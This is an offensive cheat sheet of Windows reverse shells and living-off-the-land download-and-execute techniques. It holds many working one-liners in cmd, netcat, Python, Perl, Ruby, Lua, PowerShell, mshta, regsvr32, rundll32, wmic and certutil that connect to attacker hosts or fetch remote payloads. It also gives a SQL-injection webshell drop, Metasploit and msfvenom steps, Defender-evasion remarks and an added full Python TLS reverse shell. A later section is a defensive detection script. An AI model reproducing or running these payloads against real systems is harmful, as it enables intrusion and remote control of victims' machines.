Shells - Windows


Last updated 3 years ago


The page lolbas-project.github.io is for Windows what https://gtfobins.github.io/ is for Linux. Obviously there are no SUID files or sudo privileges on Windows, but it is useful to know how some built-in binaries can be (ab)used to perform unexpected actions such as fetching and executing arbitrary code. The notes under each technique record which process makes the network call and whether the payload touches disk, which is what a defender looking at process creation and file events will see.

CMD

Serve nc.exe from the attacker over SMB (impacket's smbserver) and run it straight from the share, so the binary does not have to be copied to the victim first:

python3 /home/kali/Tools/smbserver.py -smb2support Share /home/kali/Tools

cmd.exe /c //192.168.49.239/Share/nc.exe -e cmd.exe 192.168.49.239 21

NC

nc.exe -e cmd.exe <Attacker_IP> <PORT>

Shell From SQL Injection

With a MySQL injection, SELECT ... INTO OUTFILE can drop a PHP webshell into the web root. It only works if the database user has the FILE privilege, secure_file_priv does not restrict writes to that directory, the database process can write to the web root, and the column count matches the original query:

# windows
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
# linux
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'

Certutil

Download a base64-encoded DLL, decode it and execute it (InstallUtil's /u uninstall path runs the assembly's uninstaller code). Produce payload.b64 on the attacker with certutil -encode (Windows) or base64 (Linux); note that the decoded file is written to disk.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

Download a base64-encoded EXE, decode it and execute it:

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

SBD

sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only. sbd.exe (part of the Kali linux distribution: /usr/share/windows-resources/sbd/sbd.exe) can be uploaded to a Windows box as a Netcat alternative.

Python

The original is a Windows Python 2.7 one-liner (C:\Python27\python.exe -c "...") in which the logic below has been folded into nested lambdas so it fits on one line. Unfolded, it connects back to the attacker, starts cmd.exe with pipes, and runs two threads that copy socket -> cmd.exe stdin and cmd.exe stdout -> socket. Written this way it runs under Python 2.7 and Python 3.

import socket, subprocess, threading

HOST, PORT = '10.11.0.37', 4444          # attacker listener

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
p = subprocess.Popen(['\\windows\\system32\\cmd.exe'],
                     stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

def s2p():                               # socket -> process stdin
    while True:
        data = s.recv(1024)
        if not data:
            break
        p.stdin.write(data)
        p.stdin.flush()

def p2s():                               # process stdout -> socket
    while True:
        b = p.stdout.read(1)
        if not b:
            break
        s.send(b)

for fn in (s2p, p2s):
    t = threading.Thread(target=fn)
    t.daemon = True
    t.start()
try:
    p.wait()                             # stay alive until cmd.exe exits
except KeyboardInterrupt:
    s.close()

Perl

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

The first form execs /bin/sh; on a Windows Perl replace "/bin/sh -i" with "cmd.exe". The second form runs each received line with system(), so it works on either platform.

Ruby

#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Lua

Requires LuaSocket; replace 127.0.0.1:4444 with the attacker's address (the mode argument of io.popen must be double-quoted so it does not break out of the shell's single quotes):

lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

OpenSSL

Encrypted reverse shell with openssl s_server / s_client. Because the victim side is a pipe chain, two listener ports are used: commands are typed into the first and the output arrives on the second.

Attacker (Kali)

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes   #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port>                    #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2>                   #Here you will be able to get the response

Victim

#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT2>
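If openssl.exe is not on the victim but Python is, the same encrypted channel can be built in a few lines and, because the client owns the socket, both directions fit on one port. The following is an added example, not code from the original page: a Python TLS client that connects to the openssl s_server listener above (single port, e.g. `openssl s_server -quiet -key key.pem -cert cert.pem -port 443`), runs each received line through the platform shell and writes the output back. The listener cert is self-signed, so instead of CA validation the client pins the SHA-256 fingerprint of cert.pem (assumption: you pass the value printed by `openssl x509 -in cert.pem -noout -fingerprint -sha256`). The listener address, port and fingerprint argument are assumptions for the example; run_locally() exercises the command loop over an in-process socketpair without any network.

```python
import hashlib
import socket
import ssl
import subprocess
import sys
import threading

# Added example (not from the original page). Speaks TLS to the attacker's
# openssl s_server; listener address, port and pinned fingerprint are assumptions.

PROMPT = b"> "

def run_command(cmd: str, timeout: int = 60) -> bytes:
    """Run one command line through the platform shell (cmd.exe on Windows,
    /bin/sh elsewhere) and return combined stdout+stderr."""
    try:
        r = subprocess.run(cmd, shell=True, capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return b"[command timed out]\n"
    return r.stdout + r.stderr

def serve_shell(sock) -> None:
    """Command loop: read newline-terminated commands from sock, execute each
    and write the output back on the same socket. Returns on 'exit' or EOF."""
    buf = b""
    sock.sendall(PROMPT)
    while True:
        chunk = sock.recv(4096)
        if not chunk:                      # peer closed the connection
            return
        buf += chunk
        while b"\n" in buf:
            line, buf = buf.split(b"\n", 1)
            cmd = line.strip().decode("utf-8", "replace")
            if cmd in ("exit", "quit"):
                return
            if cmd:
                sock.sendall(run_command(cmd))
            sock.sendall(PROMPT)

def connect_tls(host: str, port: int, pinned_sha256: str = None):
    """Open a TLS connection to the listener. The listener uses a self-signed
    cert, so CA verification is off; instead the SHA-256 fingerprint of the
    server certificate is pinned so a middlebox cannot quietly take over."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False             # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    tls = ctx.wrap_socket(socket.create_connection((host, port)), server_hostname=host)
    if pinned_sha256:
        der = tls.getpeercert(binary_form=True)   # DER cert is available even with CERT_NONE
        seen = hashlib.sha256(der).hexdigest()
        if seen != pinned_sha256.replace(":", "").lower():
            tls.close()
            raise ssl.SSLError("listener certificate fingerprint mismatch: " + seen)
    return tls

def run_locally(script: bytes) -> bytes:
    """Drive serve_shell() over an in-process socketpair (no network, no TLS)
    so the command loop can be checked before deploying it."""
    a, b = socket.socketpair()
    t = threading.Thread(target=lambda: (serve_shell(a), a.close()))
    t.start()
    b.sendall(script)
    b.shutdown(socket.SHUT_WR)             # EOF for the shell side once the script is consumed
    out = b""
    while True:
        chunk = b.recv(4096)
        if not chunk:
            break
        out += chunk
    t.join()
    b.close()
    return out

if __name__ == "__main__":
    # python3 tls_shell.py <ATTACKER_IP> <PORT> [sha256-fingerprint-of-cert.pem]
    host, port = sys.argv[1], int(sys.argv[2])
    pin = sys.argv[3] if len(sys.argv) > 3 else None
    tls = connect_tls(host, port, pin)
    try:
        serve_shell(tls)
    finally:
        tls.close()
```

On the attacker only one `openssl s_server -quiet ...` is needed: what you type goes to the victim and the output comes back on the same TLS socket. Without the fingerprint argument the client will happily talk to any TLS server, which is the same weakness the plain s_client pipe has.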

Powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile

Process performing network call: powershell.exe Payload written on disk: NO (at least nowhere I could find using procmon !)

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

One liner (TCP reverse shell: reads from the socket, runs each chunk with iex, and sends back the output followed by a "PS <cwd>> " prompt):

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Get more info about different Powershell Shells at the end of this document

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

Process performing network call: mshta.exe Payload written on disk: IE local cache

mshta http://webserver/payload.hta

Process performing network call: mshta.exe Payload written on disk: IE local cache

mshta \\webdavserver\folder\payload.hta

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

Example of hta-psh reverse shell (use hta to download and execute PS backdoor)

 <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>

You can download & execute very easily a Koadic zombie using the stager hta

hta example

<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
    var c = "cmd.exe /c calc.exe";
    new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

mshta - sct

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
<scriptlet>
<public></public>
<script language="JScript">
<![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Mshta - Metasploit

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit

Detected by defender

Rundll32

rundll32 \\webdavserver\folder\payload.dll,entrypoint

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Process performing network call: rundll32.exe Payload written on disk: IE local cache

Detected by defender

Rundll32 - sct

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public></public>
<script language="JScript">
<![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Rundll32 - Metasploit

use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0

Rundll32 - Koadic

use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();

Regsvr32

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

Process performing network call: regsvr32.exe Payload written on disk: IE local cache

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

Detected by defender

Regsvr32 - sct

<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration progid="PoC" classid="{10001111-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
        <![CDATA[
            var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
        ]]>
    </script>
</registration>
</scriptlet>

Regsvr32 - Metasploit

use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse_tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll

You can download & execute very easily a Koadic zombie using the stager regsvr

Detected by defender

Cscript/Wscript

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

Cscript - Metasploit

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs

Detected by defender

PS-Bat

\\webdavserver\folder\batchfile.bat

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
\\10.8.0.3\kali\shell.bat

Detected by defender

MSIExec

Attacker

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80

Victim:

victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi

The victim command above installs from an SMB share, so either serve shell.msi with impacket-smbserver (as in the PS-Bat section) or point msiexec at the HTTP server instead: msiexec /quiet /i http://10.2.0.5/shell.msi

Detected

Wmic

wmic os get /format:"https://webserver/payload.xsl"

Process performing network call: wmic.exe Payload written on disk: IE local cache

Example xsl file:

<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
        <![CDATA[
            var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
        ]]>
    </ms:script>
</stylesheet>

Not detected

You can download & execute very easily a Koadic zombie using the stager wmic

Msbuild

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj

Not detected

CSC

Compile C# code on the victim machine.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs

Not detected

Regasm/Regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

I haven't tried it

Odbcconf

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

I haven't tried it
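The "Process performing network call / Payload written on disk" notes in the sections above are what a defender has to work with: the LOLBin itself shows up as the process making the HTTP request and leaves a copy in the IE cache, while anything loaded from a \\webdavserver\ path is fetched by svchost.exe (the WebDAV client) and cached there. The following is an added example, not part of the original page: a small Python rule set that flags the command lines collected above in constructed Sysmon-style process-creation records, and attaches that note to each hit so an analyst knows where to look next. The record format ("Image: ... | CommandLine: ..."), the rule names and the sample records are all constructed for this example; the rules generalise slightly beyond the page (any UNC or http source for the same binaries), and the local-file cases the page also lists (msbuild MSBuildShell.csproj, csc.exe) are deliberately not covered because they look like ordinary developer activity.

```python
import re
from typing import List, NamedTuple

# Added example (not from the original page): flag the LOLBin command lines
# collected above in constructed Sysmon-style process-creation records.
# Rule names, the record format and the sample records are all constructed here.

class Rule(NamedTuple):
    name: str
    pattern: "re.Pattern"
    note: str   # where the network call / on-disk copy shows up, per the notes above

def _r(p: str) -> "re.Pattern":
    return re.compile(p, re.IGNORECASE)

# A "\\host\..." prefix: for WebDAV shares the fetch is done by svchost.exe and
# a copy lands in the WebDAV client cache, not under the LOLBin's own name.
UNC = r"\\\\[\w.-]+\\"

RULES = [
    Rule("certutil download/decode", _r(r"\bcertutil(\.exe)?\b.*(-urlcache|-decode)"),
         "certutil.exe makes the HTTP request; decoded payload is written to disk"),
    Rule("mshta inline or remote script",
         _r(r'\bmshta(\.exe)?\s+"?(vbscript:|javascript:|https?://|//|' + UNC + ")"),
         "mshta.exe via the IE cache, or svchost.exe + WebDAV cache for a UNC path"),
    Rule("regsvr32 remote scriptlet", _r(r"\bregsvr32(\.exe)?\b.*/i:.*\bscrobj\.dll"),
         "regsvr32.exe via the IE cache, or svchost.exe + WebDAV cache for a UNC path"),
    Rule("rundll32 javascript or UNC DLL", _r(r"\brundll32(\.exe)?\b.*(javascript:|" + UNC + ")"),
         "rundll32.exe via the IE cache, or svchost.exe + WebDAV cache for a UNC path"),
    Rule("wmic remote XSL", _r(r'\bwmic(\.exe)?\b.*/format:\s*"?(https?://|' + UNC + ")"),
         "wmic.exe fetches the stylesheet via the IE cache"),
    Rule("msiexec remote package", _r(r'\bmsiexec(\.exe)?\b.*/i\s+"?(https?://|' + UNC + ")"),
         "package fetched over HTTP or from a share before it is installed"),
    Rule("odbcconf regsvr", _r(r"\bodbcconf(\.exe)?\b.*/a\s*\{\s*regsvr"),
         "svchost.exe fetches the DLL; copy in the WebDAV client cache"),
    Rule("msbuild project from UNC", _r(r"\bmsbuild(\.exe)?\b.*" + UNC),
         "svchost.exe fetches the project; copy in the WebDAV client cache"),
    Rule("regasm/regsvcs assembly from UNC", _r(r"\b(regasm|regsvcs)(\.exe)?\b.*" + UNC),
         "svchost.exe fetches the DLL; copy in the WebDAV client cache"),
    Rule("powershell download cradle",
         _r(r"\bpowershell(\.exe)?\b(?=.*(downloadstring|downloadfile|\biwr\b|invoke-webrequest))"
            r"(?=.*(\biex\b|invoke-expression))"),
         "powershell.exe makes the request; nothing written to disk"),
]

def match_rules(command_line: str) -> List[str]:
    """Names of all rules whose pattern matches the command line."""
    return [r.name for r in RULES if r.pattern.search(command_line)]

def parse_event(line: str) -> dict:
    """Parse one constructed 'Image: <path> | CommandLine: <cmd>' record."""
    image, _, cmd = line.partition(" | CommandLine: ")
    return {"Image": image.split("Image: ", 1)[-1].strip(), "CommandLine": cmd.strip()}

def scan(lines) -> List[dict]:
    """Return the records that trip at least one rule, annotated with the rule
    names and the note on where the fetch / on-disk copy will be found."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        names = match_rules(ev["CommandLine"])
        if names:
            ev["rules"] = names
            ev["notes"] = [r.note for r in RULES if r.name in names]
            hits.append(ev)
    return hits

# Constructed sample records: ten taken from the one-liners on this page, four benign.
SAMPLE_LOG = [
    r'Image: C:\Windows\System32\mshta.exe | CommandLine: mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))',
    r'Image: C:\Windows\System32\regsvr32.exe | CommandLine: regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll',
    r'Image: C:\Windows\System32\rundll32.exe | CommandLine: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();',
    r'Image: C:\Windows\System32\rundll32.exe | CommandLine: rundll32 \\webdavserver\folder\payload.dll,entrypoint',
    r'Image: C:\Windows\System32\wbem\WMIC.exe | CommandLine: wmic os get /format:"https://webserver/payload.xsl"',
    r'Image: C:\Windows\System32\certutil.exe | CommandLine: certutil -urlcache -split -f http://webserver/payload.b64 payload.b64',
    r'Image: C:\Windows\System32\msiexec.exe | CommandLine: msiexec /quiet /i \\10.2.0.5\kali\shell.msi',
    r'Image: C:\Windows\System32\odbcconf.exe | CommandLine: odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}',
    r'Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe | CommandLine: regasm.exe /u \\webdavserver\folder\payload.dll',
    r'''Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CommandLine: powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex"''',
    r'Image: C:\Windows\System32\rundll32.exe | CommandLine: rundll32.exe shell32.dll,Control_RunDLL',
    r'Image: C:\Windows\System32\certutil.exe | CommandLine: certutil -hashfile C:\Users\me\setup.exe SHA256',
    r'Image: C:\Windows\System32\msiexec.exe | CommandLine: msiexec /i C:\installers\app.msi /qn',
    r'Image: C:\Windows\System32\wbem\WMIC.exe | CommandLine: wmic os get caption',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["Image"], "->", ", ".join(hit["rules"]))
        for note in hit["notes"]:
            print("    look at:", note)
```

The patterns key on the argument shape (a remote or UNC source, the scrobj.dll / javascript: / {regsvr ...} markers) rather than on the binary name alone, so ordinary use of certutil, rundll32, msiexec and wmic does not fire. Point it at real Sysmon Event ID 1 or 4688 data by adapting parse_event().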

Powershell Shells

PS-Nishang

In the Shells folder there are a lot of different shells. To download and execute Invoke-PowerShellTcp.ps1 make a copy of the script, append to the end of the file:

Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444

Start serving the script in a web server and execute in the victim:

powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"

Defender doesn't detect it as malicious code (yet, 3/04/2019).

TODO: Check other nishang shells

PS-Powercat

Download, start web server, start listener and execute in victim:

 powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Defender doesn't detect it as malicious code (yet, 3/04/2019).

Other options offered by powercat:

Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...

Serve a cmd Shell:
    powercat -l -p 443 -e cmd
Send a cmd Shell:
    powercat -c 10.1.1.1 -p 443 -e cmd
Send a powershell:
    powercat -c 10.1.1.1 -p 443 -ep
Send a powershell UDP:
    powercat -c 10.1.1.1 -p 443 -ep -u
TCP Listener to TCP Client Relay:
    powercat -l -p 8000 -r tcp:10.1.1.16:443
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
    powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
    powercat -l -p 443 -i C:\inputfile -rep

Empire

Create a powershell launcher, save it in a file, then download and execute it. The launcher connects back to Empire on its own, so nothing needs to be chained after iex:

powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex"

Detected as malicious code

MSF-Unicorn

Create a powershell version of a Metasploit backdoor using unicorn:

python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443

Start msfconsole with the created resource:

msfconsole -r unicorn.rc

Start a web server serving the powershell_attack.txt file and execute in the victim:

powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"

Detected as malicious code

More

MSBuildShell (run with msbuild.exe as in the Msbuild section) can be used to bypass application whitelisting and powershell.exe restrictions, as you will be prompted with a PS shell. Just download it and execute it: https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj

You can download a basic C# reverse shell from here: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

Tools used above:
  • Nishang: https://github.com/samratashok/nishang
  • Powercat: https://github.com/besimorhino/powercat
  • Empire: https://github.com/EmpireProject/Empire
  • Unicorn: https://github.com/trustedsec/unicorn
  • PS>Attack: PS console with some offensive PS modules preloaded (cyphered)
  • WinPWN: PS console with some offensive PS modules and proxy detection (IEX)

Extracted from:
  • https://lolbas-project.github.io
  • https://gtfobins.github.io/
  • https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182
  • https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2
  • https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9